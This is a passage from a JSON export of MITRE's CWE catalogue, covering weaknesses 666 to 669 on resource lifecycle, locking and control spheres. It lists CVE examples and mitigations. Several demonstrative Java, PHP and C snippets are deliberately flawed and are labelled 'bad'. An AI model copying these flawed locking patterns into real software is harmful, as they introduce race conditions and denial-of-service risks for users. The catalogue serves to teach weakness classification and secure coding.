Condition"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"26"}},{"attr":{"@_CAPEC_ID":"29"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-436"}},{"attr":{"@_External_Reference_ID":"REF-437"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 7, "Variable Initialization", Page 312"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Modes_of_Introduction, Name, Observed_Examples, Potential_Mitigations, References, Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Detection_Factors, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Observed_Examples"}],"Previous_Entry_Name":{"#text":"Incorrect or Incomplete Initialization","attr":{"@_Date":"2009-01-12"}}}},"666":{"attr":{"@_ID":"666","@_Name":"Operation on Resource in Wrong Phase of Lifetime","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software performs an operation on a resource at the wrong phase of the resource\'s lifecycle, which can lead to unexpected behaviors.","Extended_Description":"When a developer wants to initialize, use or release a resource, it is important to follow the specifications outlined for how to operate on that resource and to ensure that the resource is in the expected state. In this case, the software wants to perform a normally valid operation, initialization, use or release, on a resource when it is in the incorrect phase of its lifetime.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Follow the resource\'s lifecycle from creation to release."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO46-C","Entry_Name":"Do not access a closed file","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM30-C","Entry_Name":"Do not access freed memory","Mapping_Fit":"CWE More Abstract"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Time_of_Introduction"}]}},"667":{"attr":{"@_ID":"667","@_Name":"Improper Locking","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly acquire or release a lock on a resource, leading to unexpected resource state changes and behaviors.","Extended_Description":{"xhtml:p":"Locking is a type of synchronization behavior that ensures that multiple independently-operating processes or threads do not interfere with each other when accessing the same resource. All processes/threads are expected to follow the same steps for locking. If these steps are not followed precisely - or if no locking is done at all - then another process/thread could modify the shared resource in a way that is not visible or predictable to the original process. This can lead to data or memory corruption, denial of service, etc."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (CPU)","Note":"Inconsistent locking discipline can lead to deadlock."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Strategy":"Libraries or Frameworks","Description":"Use industry standard APIs to implement locking mechanism."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In the following Java snippet, methods are defined to get and set a long field in an instance of a class that is shared across multiple threads. Because operations on double and long are nonatomic in Java, concurrent access may cause unexpected behavior. Thus, all operations on long and double fields should be synchronized.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private long someLongValue;public long getLongValue() {}public void setLongValue(long l) {}","xhtml:br":["","",""],"xhtml:div":[{"#text":"return someLongValue;","attr":{"@_style":"margin-left:10px;"}},{"#text":"someLongValue = l;","attr":{"@_style":"margin-left:10px;"}}]}}},{"attr":{"@_Demonstrative_Example_ID":"DX-69"},"Intro_Text":"This code tries to obtain a lock for a file, then writes to it.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function writeToLog($message){}fclose($logFile);","xhtml:div":{"#text":"$logfile = fopen(\\"logFile.log\\", \\"a\\");if (flock($logfile, LOCK_EX)) {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:i":"//attempt to get logfile lock","xhtml:div":[{"#text":"fwrite($logfile,$message);flock($logfile, LOCK_UN);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:i":"// unlock logfile"},{"#text":"print \\"Could not obtain lock on logFile.log, message not recorded\\\\n\\";","attr":{"@_style":"margin-left:10px;"}}]},"xhtml:br":""}},"Body_Text":"PHP by default will wait indefinitely until a file lock is released. If an attacker is able to obtain the file lock, this code will pause execution, possibly leading to denial of service for other users. Note that in this case, if an attacker can perform an flock() on the file, they may already have privileges to destroy the log file. However, this still impacts the execution of other programs that depend on flock()."},{"attr":{"@_Demonstrative_Example_ID":"DX-24"},"Intro_Text":"The following function attempts to acquire a lock in order to perform operations on a shared resource.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void f(pthread_mutex_t *mutex) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"pthread_mutex_lock(mutex);pthread_mutex_unlock(mutex);","xhtml:br":["","","","",""],"xhtml:i":"/* access shared resource */"}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"int f(pthread_mutex_t *mutex) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int result;result = pthread_mutex_lock(mutex);if (0 != result)return pthread_mutex_unlock(mutex);","xhtml:br":["","","","","","","",""],"xhtml:div":{"#text":"return result;","attr":{"@_style":"margin-left:10px;"}},"xhtml:i":"/* access shared resource */"}}}}],"Body_Text":["However, the code does not check the value returned by pthread_mutex_lock() for errors. If pthread_mutex_lock() cannot acquire the mutex for any reason, the function may introduce a race condition into the program and result in undefined behavior.","In order to avoid data races, correctly written programs must check the result of thread synchronization functions and appropriately handle all errors, either by attempting to recover from them or reporting them to higher levels."]},{"attr":{"@_Demonstrative_Example_ID":"DX-70"},"Intro_Text":"It may seem that the following bit of code achieves thread safety while avoiding unnecessary synchronization...","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"if (helper == null) {}return helper;","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"synchronized (this) {}","xhtml:div":{"#text":"if (helper == null) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"helper = new Helper();","attr":{"@_style":"margin-left:10px;"}}}}},"xhtml:br":""}},{"attr":{"@_Nature":"bad"},"xhtml:div":"helper = new Helper();"}],"Body_Text":["The programmer wants to guarantee that only one Helper() object is ever allocated, but does not want to pay the cost of synchronization every time this code is called.","Suppose that helper is not initialized. Then, thread A sees that helper==null and enters the synchronized block and begins to execute:","If a second thread, thread B, takes over in the middle of this call and helper has not finished running the constructor, then thread B may make calls on helper while its fields hold incorrect values."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-0935","Description":"Attacker provides invalid address to a memory-reading function, causing a mutex to be unlocked twice","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0935"},{"Reference":"CVE-2010-4210","Description":"function in OS kernel unlocks a mutex that was not previously locked, causing a panic or overwrite of arbitrary memory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4210"},{"Reference":"CVE-2008-4302","Description":"Chain: OS kernel does not properly handle a failure of a function call (CWE-755), leading to an unlock of a resource that was not locked (CWE-832), with resultant crash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4302"},{"Reference":"CVE-2009-1243","Description":"OS kernel performs an unlock in some incorrect circumstances, leading to panic.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1243"},{"Reference":"CVE-2009-2857","Description":"OS deadlock","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2857"},{"Reference":"CVE-2009-1961","Description":"OS deadlock involving 3 separate functions","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1961"},{"Reference":"CVE-2009-2699","Description":"deadlock in library","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2699"},{"Reference":"CVE-2009-4272","Description":"deadlock triggered by packets that force collisions in a routing table","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4272"},{"Reference":"CVE-2002-1850","Description":"read/write deadlock between web server and script","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1850"},{"Reference":"CVE-2004-0174","Description":"web server deadlock involving multiple listening connections","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0174"},{"Reference":"CVE-2009-1388","Description":"multiple simultaneous calls to the same function trigger deadlock.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1388"},{"Reference":"CVE-2006-5158","Description":"chain: other weakness leads to NULL pointer dereference (CWE-476) or deadlock (CWE-833).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5158"},{"Reference":"CVE-2006-4342","Description":"deadlock when an operation is performed on a resource while it is being removed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4342"},{"Reference":"CVE-2006-2374","Description":"Deadlock in device driver triggered by using file handle of a related device.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2374"},{"Reference":"CVE-2006-2275","Description":"Deadlock when large number of small messages cannot be processed quickly enough.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2275"},{"Reference":"CVE-2005-3847","Description":"OS kernel has deadlock triggered by a signal during a core dump.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3847"},{"Reference":"CVE-2005-3106","Description":"Race condition leads to deadlock.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3106"},{"Reference":"CVE-2005-2456","Description":"Chain: array index error (CWE-129) leads to deadlock (CWE-833)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2456"},{"Reference":"CVE-2001-0682","Description":"Program can not execute when attacker obtains a mutex.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0682"},{"Reference":"CVE-2002-1914","Description":"Program can not execute when attacker obtains a lock on a critical output file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1914"},{"Reference":"CVE-2002-1915","Description":"Program can not execute when attacker obtains a lock on a critical output file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1915"},{"Reference":"CVE-2002-0051","Description":"Critical file can be opened with exclusive read access by user, preventing application of security policy. Possibly related to improper permissions, large-window race condition.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0051"},{"Reference":"CVE-2000-0338","Description":"Chain: predictable file names used for locking, allowing attacker to create the lock beforehand. Resultant from permissions and randomness.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0338"},{"Reference":"CVE-2000-1198","Description":"Chain: Lock files with predictable names. Resultant from randomness.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1198"},{"Reference":"CVE-2002-1869","Description":"Product does not check if it can write to a log file, allowing attackers to avoid logging by accessing the file using an exclusive lock. Overlaps unchecked error condition. This is not quite CWE-412, but close.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1869"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"CON31-C","Entry_Name":"Do not destroy a mutex while it is locked","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"POS48-C","Entry_Name":"Do not unlock or destroy another POSIX thread\'s mutex","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"VNA00-J","Entry_Name":"Ensure visibility when accessing shared primitive variables"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"VNA02-J","Entry_Name":"Ensure that compound operations on shared variables are atomic"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"VNA05-J","Entry_Name":"Ensure atomicity when reading and writing 64-bit values"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"LCK06-J","Entry_Name":"Do not use an instance lock to protect shared static data"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP19","Entry_Name":"Missing Lock"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-667"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"25"}},{"attr":{"@_CAPEC_ID":"26"}},{"attr":{"@_CAPEC_ID":"27"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-667"}}},"Notes":{"Note":{"#text":"Deeper research is necessary for synchronization and related mechanisms, including locks, mutexes, semaphores, and other mechanisms. Multiple entries are dependent on this research, which includes relationships to concurrency, race conditions, reentrant functions, etc. CWE-662 and its children - including CWE-667, CWE-820, CWE-821, and others - may need to be modified significantly, along with their relationships.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-23","Modification_Comment":"updated Description, Maintenance_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":{"#text":"Insufficient Locking","attr":{"@_Date":"2010-12-13"}}}},"668":{"attr":{"@_ID":"668","@_Name":"Exposure of Resource to Wrong Sphere","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product exposes a resource to the wrong control sphere, providing unintended actors with inappropriate access to the resource.","Extended_Description":{"xhtml:p":["Resources such as files and directories may be inadvertently exposed through mechanisms such as insecure permissions, or when a program accidentally operates on the wrong object. For example, a program may intend that private files can only be provided to a specific user. This effectively defines a control sphere that is intended to prevent attackers from accessing these private files. If the file permissions are insecure, then parties other than the user will be able to access those files.","A separate control sphere might effectively require that the user can only access the private files, but not any other files on the system. If the program does not ensure that the user is only requesting private files, then the user might be able to access other files on the system.","In either case, the end result is that a resource has been exposed to the wrong party."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Other"],"Impact":["Read Application Data","Modify Application Data","Other"]}},"Notes":{"Note":{"#text":"A \\"control sphere\\" is a set of resources and behaviors that are accessible to a single actor, or a group of actors. A product\'s security model will typically define multiple spheres, possibly implicitly. For example, a server might define one sphere for \\"administrators\\" who can create new user accounts with subdirectories under /home/server/, and a second sphere might cover the set of users who can create or delete files within their own subdirectories. A third sphere might be \\"users who are authenticated to the operating system on which the product is installed.\\" Each sphere has different sets of actors and allowable behaviors.","attr":{"@_Type":"Theoretical"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-22","Modification_Importance":"Critical","Modification_Comment":"Clarified description to include permissions."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}]}},"669":{"attr":{"@_ID":"669","@_Name":"Incorrect Resource Transfer Between Spheres","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not properly transfer a resource/behavior to another sphere, or improperly imports a resource/behavior from another sphere, in a manner that provides unintended control over that resource.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Background_Details":{"Background_Detail":"A \\"control sphere\\" is a set of resources and behaviors that are accessible to a single actor, or a group of actors. A product\'s security model will typically define multiple spheres, possibly implicitly. For example, a server might define one sphere for \\"administrators\\" who can create new user accounts with subdirectories under /home/server/, and a second sphere might cover the set of users who can create or delete files within their own subdirectories. A third sphere might be \\"users who are authenticated to the operating system on which the product is installed.\\" Each sphere has different sets of actors and allowable behaviors."},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data","Unexpected State"]}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content 